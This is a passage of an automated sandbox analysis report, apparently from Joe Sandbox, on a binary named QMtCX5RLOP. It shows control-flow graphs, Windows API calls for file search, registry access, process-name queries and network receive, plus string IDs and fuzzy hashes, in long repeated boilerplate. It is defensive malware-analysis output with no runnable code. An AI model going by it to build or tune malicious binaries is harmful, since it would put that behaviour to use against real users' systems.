                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                            • String ID: @$`
                                                            • API String ID: 3271271169-3318628307
                                                            • Opcode ID: b26dfe311aaa23b1be4435169bd2691dda7fc91328063717ed0ea8a7e7757b4f
                                                            • Instruction ID: 8a2ff64905fdbcd96f7a94e4abc1ebae66b367066afaa30191a192f5827d8695
                                                            • Opcode Fuzzy Hash: b26dfe311aaa23b1be4435169bd2691dda7fc91328063717ed0ea8a7e7757b4f
                                                            • Instruction Fuzzy Hash: EBD1A3B4909319DFDB14EF68C58469EBBF0BF58748F00896DE89897350E7349A84CF92
                                                            Function 00D429FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1038 d429ff-d42a2f FindFirstFileA 1039 d42a31-d42a36 1038->1039 1040 d42a38 1038->1040 1041 d42a3d-d42a91 call 11c9c50 call 11c9ce0 RegOpenKeyExA 1039->1041 1040->1041 1046 d42a93-d42a98 1041->1046 1047 d42a9a 1041->1047 1048 d42a9f-d42b0c call 11c9c50 call 11c9ce0 CharUpperA call 10c8da0 1046->1048 1047->1048 1056 d42b15 1048->1056 1057 d42b0e-d42b13 1048->1057 1058 d42b1a-d42b92 call 11c9c50 call 11c9ce0 call 10c8e80 call 10c8e70 1056->1058 1057->1058 1067 d42b94-d42ba3 1058->1067 1068 d42bcc-d42c66 QueryFullProcessImageNameA CloseHandle call 10c8da0 1058->1068 1071 d42ba5-d42bae 1067->1071 1072 d42bb0-d42bc0 call 10c8e68 1067->1072 1078 d42c6f 1068->1078 1079 d42c68-d42c6d 1068->1079 1071->1068 1075 d42bc5-d42bca 1072->1075 1075->1067 1075->1068 1080 d42c74-d42ce9 call 11c9c50 call 11c9ce0 call 10c8e80 call 10c8e70 1078->1080 1079->1080 1089 d42dcf-d42e21 call 11c9c50 call 11c9ce0 CloseHandle call 6ee0183 1080->1089 1090 d42cef-d42d49 call 10c8bb0 call 10c8da0 1080->1090 1100 d42e23-d42e2e 1089->1100 1101 d42d99-d42dad 1090->1101 1102 d42d4b-d42d63 call 10c8da0 1090->1102 1103 d42e37 1100->1103 1104 d42e30-d42e35 1100->1104 1101->1089 1102->1101 1110 d42d65-d42d7d call 10c8da0 1102->1110 1106 d42e3c-d42ed6 call 11c9c50 call 11c9ce0 1103->1106 1104->1106 1119 d42ed8-d42ee1 1106->1119 1120 d42eea 1106->1120 1110->1101 1116 d42d7f-d42d97 call 10c8da0 1110->1116 1116->1101 1124 d42daf-d42dc9 call 10c8e68 1116->1124 1119->1120 1122 d42ee3-d42ee8 1119->1122 1123 d42eef-d42f16 call 11c9c50 call 11c9ce0 1120->1123 1122->1123 1124->1089 1124->1090
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                            • String ID: 0
                                                            • API String ID: 2406880114-4108050209
                                                            • Opcode ID: 25b1e6a123e66e792f70f38b10aefe383f28e79780c556e457f1ad18b101075a
                                                            • Instruction ID: 68ce42b2e58126816aa3cc7015f116eb5fd3545af9f529e753db0eca7c479ed4
                                                            • Opcode Fuzzy Hash: 25b1e6a123e66e792f70f38b10aefe383f28e79780c556e457f1ad18b101075a
                                                            • Instruction Fuzzy Hash: 28E1E7B49053099FCB14EF68DA846AEBBF4AF54344F40886EE888D7354E774DA84CF52
                                                            Function 00D505B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1218 d505b0-d505b7 1219 d505bd-d505d4 1218->1219 1220 d507ee 1218->1220 1221 d507e7-d507ed 1219->1221 1222 d505da-d505e6 1219->1222 1221->1220 1222->1221 1223 d505ec-d505f0 1222->1223 1224 d507c7-d507cc 1223->1224 1225 d505f6-d50620 call d57350 call d470b0 1223->1225 1224->1221 1230 d50622-d50624 1225->1230 1231 d5066a-d5068c call d7dec0 1225->1231 1233 d50630-d50655 call d470d0 call d503c0 call d57450 1230->1233 1237 d507d6-d507e3 call d57380 1231->1237 1238 d50692-d506a0 1231->1238 1258 d507ce 1233->1258 1259 d5065b-d50668 call d470e0 1233->1259 1237->1221 1241 d506f4-d506f6 1238->1241 1242 d506a2-d506a4 1238->1242 1244 d506fc-d506fe 1241->1244 1245 d507ef-d5082b call d53000 1241->1245 1247 d506b0-d506e4 call d573b0 1242->1247 1249 d5072c-d50754 1244->1249 1262 d50831-d50837 1245->1262 1263 d50a2f-d50a35 1245->1263 1247->1237 1257 d506ea-d506ee 1247->1257 1254 d50756-d5075b 1249->1254 1255 d5075f-d5078b 1249->1255 1260 d50707-d50719 WSAEventSelect 1254->1260 1261 d5075d 1254->1261 1275 d50791-d50796 1255->1275 1276 d50700-d50703 1255->1276 1257->1247 1264 d506f0 1257->1264 1258->1237 1259->1231 1259->1233 1260->1237 1268 d5071f 1260->1268 1269 d50723-d50726 1261->1269 1271 d50861-d5087e 1262->1271 1272 d50839-d5084c call d56fa0 1262->1272 1265 d50a37-d50a3a 1263->1265 1266 d50a3c-d50a52 1263->1266 1264->1241 1265->1266 1266->1237 1273 d50a58-d50a81 call d52f10 1266->1273 1268->1269 1269->1245 1269->1249 1285 d50882-d5088d 1271->1285 1283 d50852 1272->1283 1284 d50a9c-d50aa4 1272->1284 1273->1237 1291 d50a87-d50a97 call d56df0 1273->1291 1275->1276 1278 d5079c-d507c2 call d476a0 1275->1278 1276->1260 1278->1276 1283->1271 1288 d50854-d5085f 1283->1288 1284->1237 1289 d50970-d50975 1285->1289 1290 d50893-d508b1 1285->1290 1288->1285 1292 d50a19-d50a2c 1289->1292 1293 d5097b-d50989 call d470b0 1289->1293 1294 d508c8-d508f7 1290->1294 1291->1237 1292->1263 1293->1292 1301 d5098f-d5099e 1293->1301 1302 d508fd-d50925 1294->1302 1303 d508f9-d508fb 1294->1303 1304 d509b0-d509c1 call d470d0 1301->1304 1305 d50928-d5093f 1302->1305 1303->1305 1311 d509a0-d509ae call d470e0 1304->1311 1312 d509c3-d509c7 1304->1312 1309 d50945-d5096b 1305->1309 1310 d508b3-d508c2 1305->1310 1309->1310 1310->1289 1310->1294 1311->1292 1311->1304 1314 d509e8-d50a03 WSAEnumNetworkEvents 1312->1314 1315 d50a05-d50a17 1314->1315 1316 d509d0-d509e6 WSAEventSelect 1314->1316 1315->1316 1316->1311 1316->1314
                                                            APIs
                                                            • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00D50712
                                                            • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00D509DC
                                                            • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00D509FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: EventSelect$EnumEventsNetwork
                                                            • String ID: multi.c
                                                            • API String ID: 2170980988-214371023
                                                            • Opcode ID: 9908621219804423f50790488a8791d0bebfb0f04c3e0aa61b9b2169db88c29d
                                                            • Instruction ID: 355dc643890fb49445a107290489b6c500423d629e5d762969e009c6fcd86f62
                                                            • Opcode Fuzzy Hash: 9908621219804423f50790488a8791d0bebfb0f04c3e0aa61b9b2169db88c29d
                                                            • Instruction Fuzzy Hash: B6D1AE756083019FEB10DF64C881BAB7BE9FF94345F08482CFD9596242E774E958CBA2
                                                            Function 00D47770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1318 d47770-d4778e 1319 d477b6-d477c2 recv 1318->1319 1320 d47790-d47797 1318->1320 1322 d477c4-d477d9 call d472a0 1319->1322 1323 d4782e-d47832 1319->1323 1320->1319 1321 d47799-d477a1 1320->1321 1324 d477a3-d477b4 1321->1324 1325 d477db-d47829 call d472a0 call d4cb20 call 10c8c50 1321->1325 1322->1323 1324->1322 1325->1323
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: recv
                                                            • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                            • API String ID: 1507349165-640788491
                                                            • Opcode ID: f466e99241ec45ec0e5e417d2dc59b5f2e73aefd075741deedc117e8030fcd78
                                                            • Instruction ID: 73e91bc8e72d2efce2d1dc08c0dc3374c9e49358a117c151b7c6a3438cc54dee
                                                            • Opcode Fuzzy Hash: f466e99241ec45ec0e5e417d2dc59b5f2e73aefd075741deedc117e8030fcd78
                                                            • Instruction Fuzzy Hash: FF110AF5A193447BE220AA259DCAE773F9CDBC6B68F48091CBC4463346E6619D0086F2
                                                            Function 00E0B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • getsockname.WS2_32(-00000020,-00000020,?), ref: 00E0B2B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: ares__sortaddrinfo.c$cur != NULL
                                                            • API String ID: 3358416759-2430778319
                                                            • Opcode ID: f2539a3d969564923b19598592a2067285110886e76297f7e10d6f7aa2c70cb0
                                                            • Instruction ID: 793f0a896ca196a64aecb80eab13ffeef4179dbf27c07e1f4da4d4c97376377c
                                                            • Opcode Fuzzy Hash: f2539a3d969564923b19598592a2067285110886e76297f7e10d6f7aa2c70cb0
                                                            • Instruction Fuzzy Hash: DFC17F716043059FD718DF24C880A6A77E2FF88304F14996CE889AB3E2E775ED85CB81
                                                            Function 00D56FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c879ece255b1a650a35fddf704469e959e532450e15362aac6ed41a73120189
                                                            • Instruction ID: 29d79e2c740ab0904ebcce9fa87473792bc2068b929e4d9d4327ec4077012ca3
                                                            • Opcode Fuzzy Hash: 9c879ece255b1a650a35fddf704469e959e532450e15362aac6ed41a73120189
                                                            • Instruction Fuzzy Hash: 5291163060C7094BDB358A29E8807BB72E5EFD4365F389B2CECA9431D4E7749C48D6A1
                                                            Function 00D41160 Relevance: 1.7, APIs: 1, Instructions: 208COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNELBASE ref: 00D41238
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: c650bb16cf55a038a270c8892c1c09b9286e1569cafb3a92e516ea9d7ff6949d
                                                            • Instruction ID: 644413701bd40c375c8dea5cffc2776f3d22aed6cabe1d60e226229db1d2e272
                                                            • Opcode Fuzzy Hash: c650bb16cf55a038a270c8892c1c09b9286e1569cafb3a92e516ea9d7ff6949d
                                                            • Instruction Fuzzy Hash: E781BEB59053058FDB20EF64E5843ADBBE1FB55304F14892DC9899B318D775E884CFA2
                                                            Function 00D411A3 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNELBASE ref: 00D41238
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: c61adcd11351be74aa8d0f43da99a534e96864a0d4dfd3f2f8e3fe54e78b0446
                                                            • Instruction ID: a927d88e16447f63e14eaa8f8181219ef813071c9a02c16d7e2103e62bb8747b
                                                            • Opcode Fuzzy Hash: c61adcd11351be74aa8d0f43da99a534e96864a0d4dfd3f2f8e3fe54e78b0446
                                                            • Instruction Fuzzy Hash: 314159B8A053118FDB20EF64E58439EBBF0BF59304F04892DD9889B358D770A885CFA1
                                                            Function 00D413C9 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNELBASE ref: 00D41238
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: e21645bbd7dd48fc2718e435c06e75a7cae2067d5ff33ff5c77d955e3319e175
                                                            • Instruction ID: c27015d86259a133ec6b647f2d9570364ec16a3b563789223f52f2b30ebf6dae
                                                            • Opcode Fuzzy Hash: e21645bbd7dd48fc2718e435c06e75a7cae2067d5ff33ff5c77d955e3319e175
                                                            • Instruction Fuzzy Hash: 194139B49053128FDB60EF64E18039DBBF0BF55314F14882EC9889B318D774A885CFA2
                                                            Function 00D431D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
